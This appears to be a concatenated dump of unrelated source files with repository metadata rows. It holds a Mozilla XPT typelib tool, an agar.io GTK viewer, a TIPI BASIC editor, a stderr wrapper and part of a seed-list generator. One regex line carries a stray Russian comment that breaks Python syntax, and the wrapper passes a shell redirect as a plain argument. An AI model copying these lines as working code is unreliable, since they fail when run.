raise Exception("result must be a Param!")
self.result = result
def __cmp__(self, other):
return (
cmp(self.name, other.name) or
cmp(self.getter, other.getter) or
cmp(self.setter, other.setter) or
cmp(self.notxpcom, other.notxpcom) or
cmp(self.constructor, other.constructor) or
cmp(self.hidden, other.hidden) or
cmp(self.optargc, other.optargc) or
cmp(self.implicit_jscontext, other.implicit_jscontext) or
cmp(self.params, other.params) or
cmp(self.result, other.result)
)
def read_params(self, typelib, map, data_pool, offset, num_args):
"""
Read |num_args| ParamDescriptors representing this Method's arguments
from the mmaped file |map| with data pool at the offset |data_pool|,
starting at |offset| into self.params. Returns the offset
suitable for reading the data following the ParamDescriptor array.
"""
for i in range(num_args):
p, offset = Param.read(typelib, map, data_pool, offset)
self.params.append(p)
return offset
def read_result(self, typelib, map, data_pool, offset):
"""
Read a ParamDescriptor representing this Method's return type
from the mmaped file |map| with data pool at the offset |data_pool|,
starting at |offset| into self.result. Returns the offset
suitable for reading the data following the ParamDescriptor.
"""
self.result, offset = Param.read(typelib, map, data_pool, offset)
return offset
@staticmethod
def decodeflags(byte):
"""
Given |byte|, an unsigned uint8 containing flag bits,
decode the flag bits as described in
http://www.mozilla.org/scriptable/typelib_file.html#MethodDescriptor
and return a dict of flagname: (True|False) suitable
for passing to Method.__init__ as **kwargs
"""
return {'getter': bool(byte & 0x80),
'setter': bool(byte & 0x40),
'notxpcom': bool(byte & 0x20),
'constructor': bool(byte & 0x10),
'hidden': bool(byte & 0x08),
# Not in the spec, see
# http://hg.mozilla.org/mozilla-central/annotate/0e0e2516f04e/xpcom/typelib/xpt/public/xpt_struct.h#l489
'optargc': bool(byte & 0x04),
'implicit_jscontext': bool(byte & 0x02),
}
def encodeflags(self):
"""
Encode the flags of this Method object, return a byte suitable
for writing to a typelib file.
"""
flags = 0
if self.getter:
flags |= 0x80
if self.setter:
flags |= 0x40
if self.notxpcom:
flags |= 0x20
if self.constructor:
flags |= 0x10
if self.hidden:
flags |= 0x08
if self.optargc:
flags |= 0x04
if self.implicit_jscontext:
flags |= 0x02
return flags
@staticmethod
def read(typelib, map, data_pool, offset):
"""
Read a MethodDescriptor at |offset| from the mmaped file |map| with
data pool offset |data_pool|. Returns (Method, next offset),
where |next offset| is an offset suitable for reading the data
following this MethodDescriptor.
"""
start = data_pool + offset - 1
flags, name_offset, num_args = Method._descriptorstart.unpack_from(map, start)
# only the first seven bits are flags
flags &= 0xFE
flags = Method.decodeflags(flags)
name = Typelib.read_string(map, data_pool, name_offset)
m = Method(name, None, **flags)
offset += Method._descriptorstart.size
offset = m.read_params(typelib, map, data_pool, offset, num_args)
offset = m.read_result(typelib, map, data_pool, offset)
return m, offset
def write(self, typelib, file):
"""
Write a MethodDescriptor to |file|, which is assumed to be
seeked to the right position.
"""
file.write(Method._descriptorstart.pack(self.encodeflags(),
self._name_offset,
len(self.params)))
for p in self.params:
p.write(typelib, file)
self.result.write(typelib, file)
def write_name(self, file, data_pool_offset):
"""
Write this method's name to |file|.
Assumes that |file| is currently seeked to an unused portion
of the data pool.
"""
if self.name:
self._name_offset = file.tell() - data_pool_offset + 1
file.write(self.name + "\x00")
else:
self._name_offset = 0
class Constant(object):
"""
A constant value of a specific type defined on an interface.
(ConstantDesciptor from the typelib specification.)
"""
_descriptorstart = struct.Struct(">I")
# Actual value is restricted to this set of types
# XXX: the spec lies, the source allows a bunch more
# http://hg.mozilla.org/mozilla-central/annotate/9c85f9aaec8c/xpcom/typelib/xpt/src/xpt_struct.c#l689
typemap = {Type.Tags.int16: '>h',
Type.Tags.uint16: '>H',
Type.Tags.int32: '>i',
Type.Tags.uint32: '>I'}
def __init__(self, name, type, value):
self.name = name
self._name_offset = 0
self.type = type
self.value = value
def __cmp__(self, other):
return (
cmp(self.name, other.name) or
cmp(self.type, other.type) or
cmp(self.value, other.value)
)
@staticmethod
def read(typelib, map, data_pool, offset):
"""
Read a ConstDescriptor at |offset| from the mmaped file |map| with
data pool offset |data_pool|. Returns (Constant, next offset),
where |next offset| is an offset suitable for reading the data
following this ConstDescriptor.
"""
start = data_pool + offset - 1
(name_offset,) = Constant._descriptorstart.unpack_from(map, start)
name = Typelib.read_string(map, data_pool, name_offset)
offset += Constant._descriptorstart.size
# Read TypeDescriptor
t, offset = Type.read(typelib, map, data_pool, offset)
c = None
if isinstance(t, SimpleType) and t.tag in Constant.typemap:
tt = Constant.typemap[t.tag]
start = data_pool + offset - 1
(val,) = struct.unpack_from(tt, map, start)
offset += struct.calcsize(tt)
c = Constant(name, t, val)
return c, offset
def write(self, typelib, file):
"""
Write a ConstDescriptor to |file|, which is assumed
to be seeked to the proper position.
"""
file.write(Constant._descriptorstart.pack(self._name_offset))
self.type.write(typelib, file)
tt = Constant.typemap[self.type.tag]
file.write(struct.pack(tt, self.value))
def write_name(self, file, data_pool_offset):
"""
Write this constants's name to |file|.
Assumes that |file| is currently seeked to an unused portion
of the data pool.
"""
if self.name:
self._name_offset = file.tell() - data_pool_offset + 1
file.write(self.name + "\x00")
else:
self._name_offset = 0
def __repr__(self):
return "Constant(%s, %s, %d)" % (self.name, str(self.type), self.value)
class Interface(object):
"""
An Interface represents an object, with its associated methods
and constant values.
(InterfaceDescriptor from the typelib specification.)
"""
_direntry = struct.Struct(">16sIII")
_descriptorstart = struct.Struct(">HH")
UNRESOLVED_IID = "00000000-0000-0000-0000-000000000000"
def __init__(self, name, iid=UNRESOLVED_IID, namespace="",
resolved=False, parent=None, methods=[], constants=[],
scriptable=False, function=False, builtinclass=False,
main_process_scriptable_only=False):
self.resolved = resolved
# TODO: should validate IIDs!
self.iid = iid
self.name = name
self.namespace = namespace
# if unresolved, all the members following this are unusable
self.parent = parent
self.methods = list(methods)
self.constants = list(constants)
self.scriptable = scriptable
self.function = function
self.builtinclass = builtinclass
self.main_process_scriptable_only = main_process_scriptable_only
# For sanity, if someone constructs an Interface and passes
# in methods or constants, then it's resolved.
if self.methods or self.constants:
# make sure it has a valid IID
if self.iid == Interface.UNRESOLVED_IID:
raise DataError("Cannot instantiate Interface %s containing methods or constants with an unresolved IID" % self.name)
self.resolved = True
# These are only used for writing out the interface
self._descriptor_offset = 0
self._name_offset = 0
self._namespace_offset = 0
self.xpt_filename = None
def __repr__(self):
return "Interface('%s', '%s', '%s', methods=%s)" % (self.name, self.iid, self.namespace, self.methods)
def __str__(self):
return "Interface(name='%s', iid='%s')" % (self.name, self.iid)
def __hash__(self):
return hash((self.name, self.iid))
def __cmp__(self, other):
c = cmp(self.iid, other.iid)
if c != 0:
return c
c = cmp(self.name, other.name)
if c != 0:
return c
c = cmp(self.namespace, other.namespace)
if c != 0:
return c
# names and IIDs are the same, check resolved
if self.resolved != other.resolved:
if self.resolved:
return -1
else:
return 1
else:
if not self.resolved:
# both unresolved, but names and IIDs are the same, so equal
return 0
# When comparing parents, only look at the name.
if (self.parent is None) != (other.parent is None):
if self.parent is None:
return -1
else:
return 1
elif self.parent is not None:
c = cmp(self.parent.name, other.parent.name)
if c != 0:
return c
return (
cmp(self.methods, other.methods) or
cmp(self.constants, other.constants) or
cmp(self.scriptable, other.scriptable) or
cmp(self.function, other.function) or
cmp(self.builtinclass, other.builtinclass) or
cmp(self.main_process_scriptable_only, other.main_process_scriptable_only)
)
def read_descriptor(self, typelib, map, data_pool):
offset = self._descriptor_offset
if offset == 0:
return
start = data_pool + offset - 1
parent, num_methods = Interface._descriptorstart.unpack_from(map, start)
if parent > 0 and parent <= len(typelib.interfaces):
self.parent = typelib.interfaces[parent - 1]
# Read methods
offset += Interface._descriptorstart.size
for i in range(num_methods):
m, offset = Method.read(typelib, map, data_pool, offset)
self.methods.append(m)
# Read constants
start = data_pool + offset - 1
(num_constants, ) = struct.unpack_from(">H", map, start)
offset = offset + struct.calcsize(">H")
for i in range(num_constants):
c, offset = Constant.read(typelib, map, data_pool, offset)
self.constants.append(c)
# Read flags
start = data_pool + offset - 1
(flags, ) = struct.unpack_from(">B", map, start)
offset = offset + struct.calcsize(">B")
# only the first two bits are flags
flags &= 0xf0
if flags & 0x80:
self.scriptable = True
if flags & 0x40:
self.function = True
if flags & 0x20:
self.builtinclass = True
if flags & 0x10:
self.main_process_scriptable_only = True
self.resolved = True
def write_directory_entry(self, file):
"""
Write an InterfaceDirectoryEntry for this interface
to |file|, which is assumed to be seeked to the correct offset.
"""
file.write(Interface._direntry.pack(Typelib.string_to_iid(self.iid),
self._name_offset,
self._namespace_offset,
self._descriptor_offset))
def write(self, typelib, file, data_pool_offset):
"""
Write an InterfaceDescriptor to |file|, which is assumed
to be seeked to the proper position. If this interface
is not resolved, do not write any data.
"""
if not self.resolved:
self._descriptor_offset = 0
return
self._descriptor_offset = file.tell() - data_pool_offset + 1
parent_idx = 0
if self.parent:
parent_idx = typelib.interfaces.index(self.parent) + 1
file.write(Interface._descriptorstart.pack(parent_idx, len(self.methods)))
for m in self.methods:
m.write(typelib, file)
file.write(struct.pack(">H", len(self.constants)))
for c in self.constants:
c.write(typelib, file)
flags = 0
if self.scriptable:
flags |= 0x80
if self.function:
flags |= 0x40
if self.builtinclass:
flags |= 0x20
if self.main_process_scriptable_only:
flags |= 0x10
file.write(struct.pack(">B", flags))
def write_names(self, file, data_pool_offset):
"""
Write this interface's name and namespace to |file|,
as well as the names of all of its methods and constants.
Assumes that |file| is currently seeked to an unused portion
of the data pool.
"""
if self.name:
self._name_offset = file.tell() - data_pool_offset + 1
file.write(self.name + "\x00")
else:
self._name_offset = 0
if self.namespace:
self._namespace_offset = file.tell() - data_pool_offset + 1
file.write(self.namespace + "\x00")
else:
self._namespace_offset = 0
for m in self.methods:
m.write_name(file, data_pool_offset)
for c in self.constants:
c.write_name(file, data_pool_offset)
class Typelib(object):
"""
A typelib represents one entire typelib file and all the interfaces
referenced within, whether defined entirely within the typelib or
merely referenced by name or IID.
Typelib objects may be instantiated directly and populated with data,
or the static Typelib.read method may be called to read one from a file.
"""
_header = struct.Struct(">16sBBHIII")
def __init__(self, version=TYPELIB_VERSION, interfaces=[], annotations=[]):
"""
Instantiate a new Typelib.
"""
self.version = version
self.interfaces = list(interfaces)
self.annotations = list(annotations)
self.filename = None
@staticmethod
def iid_to_string(iid):
"""
Convert a 16-byte IID into a UUID string.
"""
def hexify(s):
return ''.join(["%02x" % ord(x) for x in s])
return "%s-%s-%s-%s-%s" % (hexify(iid[:4]), hexify(iid[4:6]),
hexify(iid[6:8]), hexify(iid[8:10]),
hexify(iid[10:]))
@staticmethod
def string_to_iid(iid_str):
"""
Convert a UUID string into a 16-byte IID.
"""
s = iid_str.replace('-', '')
return ''.join([chr(int(s[i:i+2], 16)) for i in range(0, len(s), 2)])
@staticmethod
def read_string(map, data_pool, offset):
if offset == 0:
return ""
sz = map.find('\x00', data_pool + offset - 1)
if sz == -1:
return ""
return map[data_pool + offset - 1:sz]
@staticmethod
def read(input_file):
"""
Read a typelib from |input_file| and return
the constructed Typelib object. |input_file| can be a filename
or a file-like object.
"""
filename = ""
data = None
expected_size = None
if isinstance(input_file, basestring):
filename = input_file
with open(input_file, "rb") as f:
st = os.fstat(f.fileno())
data = f.read(st.st_size)
expected_size = st.st_size
else:
data = input_file.read()
(magic,
major_ver,
minor_ver,
num_interfaces,
file_length,
interface_directory_offset,
data_pool_offset) = Typelib._header.unpack_from(data)
if magic != XPT_MAGIC:
raise FileFormatError("Bad magic: %s" % magic)
xpt = Typelib((major_ver, minor_ver))
xpt.filename = filename
if expected_size and file_length != expected_size:
raise FileFormatError("File is of wrong length, got %d bytes, expected %d" % (expected_size, file_length))
# XXX: by spec this is a zero-based file offset. however,
# the xpt_xdr code always subtracts 1 from data offsets
# (because that's what you do in the data pool) so it
# winds up accidentally treating this as 1-based.
# Filed as: https://bugzilla.mozilla.org/show_bug.cgi?id=575343
interface_directory_offset -= 1
# make a half-hearted attempt to read Annotations,
# since XPIDL doesn't produce any anyway.
start = Typelib._header.size
(anno, ) = struct.unpack_from(">B", data, start)
tag = anno & 0x7F
if tag == 0: # EmptyAnnotation
xpt.annotations.append(None)
# We don't bother handling PrivateAnnotations or anything
for i in range(num_interfaces):
# iid, name, namespace, interface_descriptor
start = interface_directory_offset + i * Interface._direntry.size
ide = Interface._direntry.unpack_from(data, start)
iid = Typelib.iid_to_string(ide[0])
name = Typelib.read_string(data, data_pool_offset, ide[1])
namespace = Typelib.read_string(data, data_pool_offset, ide[2])
iface = Interface(name, iid, namespace)
iface._descriptor_offset = ide[3]
iface.xpt_filename = xpt.filename
xpt.interfaces.append(iface)
for iface in xpt.interfaces:
iface.read_descriptor(xpt, data, data_pool_offset)
return xpt
def __repr__(self):
return "<Typelib with %d interfaces>" % len(self.interfaces)
def _sanityCheck(self):
"""
Check certain assumptions about data contained in this typelib.
Sort the interfaces array by IID, check that all interfaces
referenced by methods exist in the array.
"""
self.interfaces.sort()
for i in self.interfaces:
if i.parent and i.parent not in self.interfaces:
raise DataError("Interface %s has parent %s not present in typelib!" % (i.name, i.parent.name))
for m in i.methods:
for n, p in enumerate(m.params):
if isinstance(p, InterfaceType) and \
p.iface not in self.interfaces:
raise DataError("Interface method %s::%s, parameter %d references interface %s not present in typelib!" % (i.name, m.name, n, p.iface.name))
if isinstance(m.result, InterfaceType) and m.result.iface not in self.interfaces:
raise DataError("Interface method %s::%s, result references interface %s not present in typelib!" % (i.name, m.name, m.result.iface.name))
def writefd(self, fd):
# write out space for a header + one empty annotation,
# padded to 4-byte alignment.
headersize = (Typelib._header.size + 1)
if headersize % 4:
headersize += 4 - headersize % 4
fd.write("\x00" * headersize)
# save this offset, it's the interface directory offset.
interface_directory_offset = fd.tell()
# write out space for an interface directory
fd.write("\x00" * Interface._direntry.size * len(self.interfaces))
# save this offset, it's the data pool offset.
data_pool_offset = fd.tell()
# write out all the interface descriptors to the data pool
for i in self.interfaces:
i.write_names(fd, data_pool_offset)
i.write(self, fd, data_pool_offset)
# now, seek back and write the header
file_len = fd.tell()
fd.seek(0)
fd.write(Typelib._header.pack(XPT_MAGIC,
TYPELIB_VERSION[0],
TYPELIB_VERSION[1],
len(self.interfaces),
file_len,
interface_directory_offset,
data_pool_offset))
# write an empty annotation
fd.write(struct.pack(">B", 0x80))
# now write the interface directory
# XXX: bug-compatible with existing xpt lib, put it one byte
# ahead of where it's supposed to be.
fd.seek(interface_directory_offset - 1)
for i in self.interfaces:
i.write_directory_entry(fd)
def write(self, output_file):
"""
Write the contents of this typelib to |output_file|,
which can be either a filename or a file-like object.
"""
self._sanityCheck()
if isinstance(output_file, basestring):
with open(output_file, "wb") as f:
self.writefd(f)
else:
self.writefd(output_file)
def dump(self, out):
"""
Print a human-readable listing of the contents of this typelib
to |out|, in the format of xpt_dump.
"""
out.write("""Header:
Major version: %d
Minor version: %d
Number of interfaces: %d
Annotations:\n""" % (self.version[0], self.version[1], len(self.interfaces)))
for i, a in enumerate(self.annotations):
if a is None:
out.write(" Annotation #%d is empty.\n" % i)
out.write("\nInterface Directory:\n")
for i in self.interfaces:
out.write(" - %s::%s (%s):\n" % (i.namespace, i.name, i.iid))
if not i.resolved:
out.write(" [Unresolved]\n")
else:
if i.parent:
out.write(" Parent: %s::%s\n" % (i.parent.namespace,
i.parent.name))
out.write(""" Flags:
Scriptable: %s
BuiltinClass: %s
Function: %s\n""" % (i.scriptable and "TRUE" or "FALSE",
i.builtinclass and "TRUE" or "FALSE",
i.function and "TRUE" or "FALSE"))
out.write(" Methods:\n")
if len(i.methods) == 0:
out.write(" No Methods\n")
else:
for m in i.methods:
out.write(" %s%s%s%s%s%s%s %s %s(%s);\n" % (
m.getter and "G" or " ",
m.setter and "S" or " ",
m.hidden and "H" or " ",
m.notxpcom and "N" or " ",
m.constructor and "C" or " ",
m.optargc and "O" or " ",
m.implicit_jscontext and "J" or " ",
str(m.result.type),
m.name,
m.params and ", ".join(str(p) for p in m.params) or ""
))
out.write(" Constants:\n")
if len(i.constants) == 0:
out.write(" No Constants\n")
else:
for c in i.constants:
out.write(" %s %s = %d;\n" % (c.type, c.name, c.value))
def xpt_dump(file):
"""
Dump the contents of |file| to stdout in the format of xpt_dump.
"""
t = Typelib.read(file)
t.dump(sys.stdout)
def xpt_link(inputs):
"""
Link all of the xpt files in |inputs| together and return the result
as a Typelib object. All entries in inputs may be filenames or
file-like objects. Non-scriptable interfaces that are unreferenced
from scriptable interfaces will be removed during linking.
"""
def read_input(i):
if isinstance(i, Typelib):
return i
return Typelib.read(i)
if not inputs:
print >>sys.stderr, "Usage: xpt_link <destination file> <input files>"
return None
# This is the aggregate list of interfaces.
interfaces = []
# This will be a dict of replaced interface -> replaced with
# containing interfaces that were replaced with interfaces from
# another typelib, and the interface that replaced them.
merged_interfaces = {}
for f in inputs:
t = read_input(f)
interfaces.extend(t.interfaces)
# Sort interfaces by name so we can merge adjacent duplicates
interfaces.sort(key=operator.attrgetter('name'))
Result = enum('Equal', # Interfaces the same, doesn't matter
'NotEqual', # Interfaces differ, keep both
'KeepFirst', # Replace second interface with first
'KeepSecond') # Replace first interface with second
def compare(i, j):
"""
Compare two interfaces, determine if they're equal or
completely different, or should be merged (and indicate which
one to keep in that case).
"""
if i == j:
# Arbitrary, just pick one
return Result.Equal
if i.name != j.name:
if i.iid == j.iid and i.iid != Interface.UNRESOLVED_IID:
# Same IID but different names: raise an exception.
raise DataError(
"Typelibs contain definitions of interface %s"
" with different names (%s (%s) vs %s (%s))!" %
(i.iid, i.name, i.xpt_filename, j.name, j.xpt_filename))
# Otherwise just different interfaces.
return Result.NotEqual
# Interfaces have the same name, so either they need to be merged
# or there's a data error. Sort out which one to keep
if i.resolved != j.resolved:
# prefer resolved interfaces over unresolved
if j.resolved:
assert i.iid == j.iid or i.iid == Interface.UNRESOLVED_IID
# keep j
return Result.KeepSecond
else:
assert i.iid == j.iid or j.iid == Interface.UNRESOLVED_IID
# replace j with i
return Result.KeepFirst
elif i.iid != j.iid:
# Prefer unresolved interfaces with valid IIDs
if j.iid == Interface.UNRESOLVED_IID:
# replace j with i
assert not j.resolved
return Result.KeepFirst
elif i.iid == Interface.UNRESOLVED_IID:
# keep j
assert not i.resolved
return Result.KeepSecond
else:
# Same name but different IIDs: raise an exception.
raise DataError(
"Typelibs contain definitions of interface %s"
" with different IIDs (%s (%s) vs %s (%s))!" %
(i.name, i.iid, i.xpt_filename,
j.iid, j.xpt_filename))
raise DataError("No idea what happened here: %s:%s (%s), %s:%s (%s)" %
(i.name, i.iid, i.xpt_filename, j.name, j.iid, j.xpt_filename))
# Compare interfaces pairwise to find duplicates that should be merged.
i = 1
while i < len(interfaces):
res = compare(interfaces[i-1], interfaces[i])
if res == Result.NotEqual:
i += 1
elif res == Result.Equal:
# Need to drop one but it doesn't matter which
del interfaces[i]
elif res == Result.KeepFirst:
merged_interfaces[interfaces[i]] = interfaces[i-1]
del interfaces[i]
elif res == Result.KeepSecond:
merged_interfaces[interfaces[i-1]] = interfaces[i]
del interfaces[i-1]
# Now fixup any merged interfaces
def checkType(t):
if isinstance(t, InterfaceType) and t.iface in merged_interfaces:
t.iface = merged_interfaces[t.iface]
elif isinstance(t, ArrayType) and \
isinstance(t.element_type, InterfaceType) and \
t.element_type.iface in merged_interfaces:
t.element_type.iface = merged_interfaces[t.element_type.iface]
for i in interfaces:
# Replace parent references
if i.parent in merged_interfaces:
i.parent = merged_interfaces[i.parent]
for m in i.methods:
# Replace InterfaceType params and return values
checkType(m.result.type)
for p in m.params:
checkType(p.type)
# There's no need to have non-scriptable interfaces in a typelib, and
# removing them saves memory when typelibs are loaded. But we can't
# just blindly remove all non-scriptable interfaces, since we still
# need to know about non-scriptable interfaces referenced from
# scriptable interfaces.
worklist = set(i for i in interfaces if i.scriptable)
required_interfaces = set()
def maybe_add_to_worklist(iface):
if iface in required_interfaces or iface in worklist:
return
worklist.add(iface)
while worklist:
i = worklist.pop()
required_interfaces.add(i)
if i.parent:
maybe_add_to_worklist(i.parent)
for m in i.methods:
if isinstance(m.result.type, InterfaceType):
maybe_add_to_worklist(m.result.type.iface)
for p in m.params:
if isinstance(p.type, InterfaceType):
maybe_add_to_worklist(p.type.iface)
elif isinstance(p.type, ArrayType) and isinstance(p.type.element_type, InterfaceType):
maybe_add_to_worklist(p.type.element_type.iface)
interfaces = list(required_interfaces)
# Re-sort interfaces (by IID)
interfaces.sort()
return Typelib(interfaces=interfaces)
if __name__ == '__main__':
if len(sys.argv) < 3:
print >>sys.stderr, "xpt <dump|link> <files>"
sys.exit(1)
if sys.argv[1] == 'dump':
xpt_dump(sys.argv[2])
elif sys.argv[1] == 'link':
xpt_link(sys.argv[3:]).write(sys.argv[2])
|
mpl-2.0
| 720,056,686,050,744,700
| 35.57987
| 164
| 0.575311
| false
| 4.090698
| false
| false
| false
|
forairan/gagar
|
gagar/window.py
|
1
|
4373
|
from gi.repository import Gtk, Gdk
from agarnet.vec import Vec
class WorldViewer(object):
"""
Draws one world and handles keys/mouse.
Does not poll for events itself.
Calls input_subscriber.on_{key_pressed|mouse_moved}() methods on key/mouse input.
Calls draw_subscriber.on_draw_{background|cells|hud}() methods when drawing.
"""
INFO_SIZE = 300
def __init__(self, world):
self.world = world
self.player = None # the focused player, or None to show full world
# the class instance on which to call on_key_pressed and on_mouse_moved
self.input_subscriber = None
# same for draw_background, draw_cells, draw_hud
self.draw_subscriber = None
self.win_size = Vec(1000, 1000 * 9 / 16)
self.screen_center = self.win_size / 2
self.screen_scale = 1
self.world_center = Vec(0, 0)
self.mouse_pos = Vec(0, 0)
window = Gtk.Window()
window.set_title('agar.io')
window.set_default_size(self.win_size.x, self.win_size.y)
window.connect('delete-event', Gtk.main_quit)
self.drawing_area = Gtk.DrawingArea()
window.add(self.drawing_area)
window.set_events(Gdk.EventMask.POINTER_MOTION_MASK)
window.connect('key-press-event', self.key_pressed)
window.connect('motion-notify-event', self.mouse_moved)
window.connect('button-press-event', self.mouse_pressed)
self.drawing_area.connect('draw', self.draw)
window.show_all()
def focus_player(self, player):
"""Follow this client regarding center and zoom."""
self.player = player
self.world = player.world
def show_full_world(self, world=None):
"""
Show the full world view instead of one client.
:param world: optionally update the drawn world
"""
self.player = None
if world:
self.world = world
def key_pressed(self, _, event):
"""Called by GTK. Set input_subscriber to handle this."""
if not self.input_subscriber: return
val = event.keyval
try:
char = chr(val)
except ValueError:
char = ''
self.input_subscriber.on_key_pressed(val=val, char=char)
def mouse_moved(self, _, event):
"""Called by GTK. Set input_subscriber to handle this."""
if not self.input_subscriber: return
self.mouse_pos = Vec(event.x, event.y)
pos_world = self.screen_to_world_pos(self.mouse_pos)
self.input_subscriber.on_mouse_moved(pos=self.mouse_pos, pos_world=pos_world)
def mouse_pressed(self, _, event):
"""Called by GTK. Set input_subscriber to handle this."""
if not self.input_subscriber: return
self.input_subscriber.on_mouse_pressed(button=event.button)
def world_to_screen_pos(self, world_pos):
return (world_pos - self.world_center) \
.imul(self.screen_scale).iadd(self.screen_center)
def screen_to_world_pos(self, screen_pos):
return (screen_pos - self.screen_center) \
.idiv(self.screen_scale).iadd(self.world_center)
def world_to_screen_size(self, world_size):
return world_size * self.screen_scale
def recalculate(self):
alloc = self.drawing_area.get_allocation()
self.win_size.set(alloc.width, alloc.height)
self.screen_center = self.win_size / 2
if self.player: # any client is focused
window_scale = max(self.win_size.x / 1920, self.win_size.y / 1080)
self.screen_scale = self.player.scale * window_scale
self.world_center = self.player.center
self.world = self.player.world
elif self.world.size:
self.screen_scale = min(self.win_size.x / self.world.size.x,
self.win_size.y / self.world.size.y)
self.world_center = self.world.center
else:
# happens when the window gets drawn before the world got updated
self.screen_scale = 1
self.world_center = Vec(0, 0)
def draw(self, _, c):
if self.draw_subscriber:
self.recalculate()
self.draw_subscriber.on_draw_background(c, self)
self.draw_subscriber.on_draw_cells(c, self)
self.draw_subscriber.on_draw_hud(c, self)
|
gpl-3.0
| 2,771,065,779,682,986,500
| 36.059322
| 85
| 0.61308
| false
| 3.677881
| false
| false
| false
|
jedimatt42/pi-messaging
|
htdocs/tipi_editor.py
|
1
|
3428
|
# tipi_editor
#
# TIPI web administration
#
# Corey J. Anderson ElectricLab.com 2017
# et al.
import os
import logging
import uuid
from ti_files import ti_files
from subprocess import call
logger = logging.getLogger(__name__)
basicSuffixes = ('.b99', '.bas', '.xb')
tipi_disk_base = '/home/tipi/tipi_disk'
def load(file_name):
edit_file_path = tipi_disk_base + '/' + file_name
file_contents = basicContents(edit_file_path)
# If it isn't a BASIC PROGRAM IMAGE, then try plain file
if not file_contents:
if file_name.lower().endswith(basicSuffixes):
with open(edit_file_path, "rb") as fh:
file_contents = fh.read()
editor_data = { 'file_contents': file_contents,
'file_name': file_name,
'status_message': '' }
return editor_data
def new(file_name):
editor_data = { 'file_contents': '',
'file_name': file_name,
'status_message': '' }
return editor_data
def save(file_name, data):
logger.debug("save %s", file_name)
edit_file_path = tipi_disk_base + '/' + file_name
logger.debug("edit_file_path %s", edit_file_path)
if file_name.lower().endswith(basicSuffixes):
logger.debug("saving ascii basic file")
with open(edit_file_path, "wb") as fh:
fh.write(data)
else:
logger.debug("saving program image basic file")
writeBasicContents(edit_file_path, data)
editor_data = { 'file_contents': data,
'file_name': file_name,
'status_message': '' }
return editor_data
def basicContents(filename):
logger.debug("fetching BASIC PROGRAM as ascii in %s", filename)
# We are assuming the test for FIAD isTiFile has already passed.
prg_tmp_file = '/tmp/' + str(uuid.uuid4()) + '.tmp'
bas_tmp_file = '/tmp/' + str(uuid.uuid4()) + '.tmp'
try:
# strip the FIAD header off to get the raw file xbas99 needs.
with open(filename, "rb") as tifile:
with open(prg_tmp_file, "wb") as program:
bytes = bytearray(tifile.read())
if not ti_files.isProgram(bytes):
return False
program.write(bytes[128:])
call(['/home/tipi/xdt99/xbas99.py', '-d', prg_tmp_file, '-o', bas_tmp_file])
if ti_files.isTiBasicAscii(bas_tmp_file):
with open(bas_tmp_file, 'rb') as content_file:
return content_file.read().decode("latin_1")
finally:
if os.path.exists(prg_tmp_file):
os.unlink(prg_tmp_file)
if os.path.exists(bas_tmp_file):
os.unlink(bas_tmp_file)
return False
def writeBasicContents(edit_file_name, file_contents):
bas_tmp_file = '/tmp/' + str(uuid.uuid4()) + '.tmp'
prg_tmp_file = '/tmp/' + str(uuid.uuid4()) + '.tmp'
try:
with open(bas_tmp_file, 'wb') as file:
file.write(file_contents.encode("latin_1"))
# Encode ASCII file to TI's binary BASIC format:
#
call(['xbas99.py', '-c', bas_tmp_file, '-o', prg_tmp_file])
# Now convert to TIFILES format:
#
call(['xdm99.py', '-T', prg_tmp_file, '-o', edit_file_name])
finally:
if os.path.exists(prg_tmp_file):
os.unlink(prg_tmp_file)
if os.path.exists(bas_tmp_file):
os.unlink(bas_tmp_file)
|
gpl-3.0
| -5,738,017,850,617,338,000
| 30.163636
| 85
| 0.573221
| false
| 3.357493
| false
| false
| false
|
galaxy-modal/transcriptomics
|
galaxy-tools/stderr_wrapper.py
|
1
|
1676
|
#!/usr/bin/python
"""
Wrapper that executes a program with its arguments but reports standard error
messages only if the program exit status was not 0. This is useful to prevent
Galaxy to interpret that there was an error if something was printed on stderr,
e.g. if this was simply a warning.
Example: ./stderr_wrapper.py myprog arg1 -f arg2
Author: Florent Angly
"""
import sys, subprocess
assert sys.version_info[:2] >= ( 2, 4 )
def stop_err( msg ):
sys.stderr.write( "%s\n" % msg )
sys.exit()
def __main__():
# Get command-line arguments
args = sys.argv
# Remove name of calling program, i.e. ./stderr_wrapper.py
args.pop(0)
# If there are no arguments left, we're done
if len(args) == 0:
return
# If one needs to silence stdout
args.append( ">" )
args.append( "/dev/null" )
#cmdline = " ".join(args)
#print cmdline
try:
# Run program
proc = subprocess.Popen( args=args, shell=False, stderr=subprocess.PIPE )
returncode = proc.wait()
# Capture stderr, allowing for case where it's very large
stderr = ''
buffsize = 1048576
try:
while True:
stderr += proc.stderr.read( buffsize )
if not stderr or len( stderr ) % buffsize != 0:
break
except OverflowError:
pass
# Running Grinder failed: write error message to stderr
if returncode != 0:
raise Exception, stderr
except Exception, e:
# Running Grinder failed: write error message to stderr
stop_err( 'Error: ' + str( e ) )
if __name__ == "__main__": __main__()
|
gpl-2.0
| -7,320,840,070,516,737,000
| 28.403509
| 81
| 0.601432
| false
| 3.897674
| false
| false
| false
|
inkvisit/sarmacoins
|
contrib/seeds/makeseeds.py
|
1
|
3522
|
#!/usr/bin/env python
#
# Generate seeds.txt from Pieter's DNS seeder
#
NSEEDS=512
MAX_SEEDS_PER_ASN=2
MIN_BLOCKS = 200000
# These are hosts that have been observed to be behaving strangely (e.g.
# aggressively connecting to every node).
SUSPICIOUS_HOSTS = set([
"127.0.0.1"
])
import re
import sys
import dns.resolver
PATTERN_IPV4 = re.compile(r"^((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})):9887$") тут изменяем порт
PATTERN_AGENT = re.compile(r"^(\/Satoshi:0.8.6\/|\/Satoshi:0.9.(2|3)\/|\/Core:0.1(0|1|2).\d{1,2}.\d{1,2}\/)$")
def parseline(line):
sline = line.split()
if len(sline) < 11:
return None
# Match only IPv4
m = PATTERN_IPV4.match(sline[0])
if m is None:
return None
# Do IPv4 sanity check
ip = 0
for i in range(0,4):
if int(m.group(i+2)) < 0 or int(m.group(i+2)) > 255:
return None
ip = ip + (int(m.group(i+2)) << (8*(3-i)))
if ip == 0:
return None
# Skip bad results.
if sline[1] == 0:
return None
# Extract uptime %.
uptime30 = float(sline[7][:-1])
# Extract Unix timestamp of last success.
lastsuccess = int(sline[2])
# Extract protocol version.
version = int(sline[10])
# Extract user agent.
agent = sline[11][1:-1]
# Extract service flags.
service = int(sline[9], 16)
# Extract blocks.
blocks = int(sline[8])
# Construct result.
return {
'ip': m.group(1),
'ipnum': ip,
'uptime': uptime30,
'lastsuccess': lastsuccess,
